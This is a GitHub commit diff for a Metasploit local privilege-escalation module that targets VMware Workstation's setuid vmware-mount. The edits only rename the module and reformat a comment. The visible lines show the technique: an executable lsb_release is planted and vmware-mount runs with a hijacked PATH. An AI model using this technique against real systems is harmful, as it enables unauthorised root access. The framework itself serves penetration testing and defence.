File tree Expand file tree Collapse file tree 1 file changed +4
-2
lines changed
modules/exploits/linux/local Expand file tree Collapse file tree 1 file changed +4
-2
lines changed Original file line number Diff line number Diff line change @@ -18,7 +18,7 @@ class Metasploit4 < Msf::Exploit::Local
18
18
19
19
def initialize ( info = { } )
20
20
super ( update_info ( info , {
21
- 'Name' => 'VMWare Setuid vmware-mount Unsafe popen' ,
21
+ 'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3) ' ,
22
22
'Description' => %q{
23
23
VMWare Workstation (up to and including 9.0.2 build-1031769)
24
24
and Player have a setuid executable called vmware-mount that
@@ -92,7 +92,9 @@ def exploit
92
92
93
93
cmd_exec ( "chmod +x lsb_release" )
94
94
cmd_exec ( "PATH=.:$PATH /usr/bin/vmware-mount" )
95
- cmd_exec ( "rm -f lsb_release" ) # using it over FileDropper because the original session can clean it up
95
+ # Delete it here instead of using FileDropper because the original
96
+ # session can clean it up
97
+ cmd_exec ( "rm -f lsb_release" )
96
98
end
97
99
98
100
def setuid? ( remote_file )
You can’t perform that action at this time.
0 commit comments